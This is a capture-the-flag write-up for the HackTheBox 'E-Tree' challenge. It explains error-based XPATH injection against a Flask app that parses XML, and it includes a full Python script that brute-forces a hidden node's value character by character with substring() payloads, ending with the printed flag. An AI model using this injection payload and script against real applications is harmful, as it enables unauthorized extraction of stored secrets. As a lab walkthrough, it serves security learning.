HackTheBox Cyber Apocalypse CTF 2021: E-Tree

TL;DR

The application is a Python Flask backend parsing XML with XPATH.
User input is embedded directly into an XPATH query.
Some users contain a hidden selfDestructCode XML node.
Error-based XPATH injection is used to brute-force the value.
substring() extracts one character at a time.
Presence of the string exists confirms a correct guess.
Iterating until } reveals the full flag.

Video Walkthrough

Challenge Description

E.Tree was a Python Flask application that used XPATH to parse XML files. We were presented with an example XML file from where we could see that some users have an additional selfDestructCode element set. Knowing this, we were able to do an error-based XPATH injection to determine the flag.

Solution

import requests
import string
from time import sleep

flag_pt1 = "CHTB{Th3_3xTr4_l3v3l_"
flag = "4Cc3s$_c0nTr0l}"
url = "http://139.59.168.47:30661/api/search"

# Each time a successful login is seen, restart loop
restart = True
count = len(flag) + 1

while restart:
    restart = False
    for char in "_" + string.ascii_letters + string.digits + "!#$%^()@{}£&*-=+.,~:;[]":
        # Update position index for the 2 seperate flag parts
        post_data = {"search": "' or substring((/military/district[position()=3]/staff[position()=2]/selfDestructCode)," + str(count) + ",1)=\"" + char + "\" or ''=' "}
        print(post_data)
        try:
            r = requests.post(url, json=post_data, headers={'Content-Type': 'application/json'})
        except BaseException:
            pass
        # Correct char results in "successful password"
        if 'exists' in r.text:
            restart = True
            count += 1
            flag += char
            print(flag)
            # Exit if "}" gives a valid redirect
            if char == "}":
                print("\nFlag: " + flag)
                exit(0)
            break

        sleep(1)

Flag: CHTB{Th3_3xTr4_l3v3l_4Cc3s$_c0nTr0l}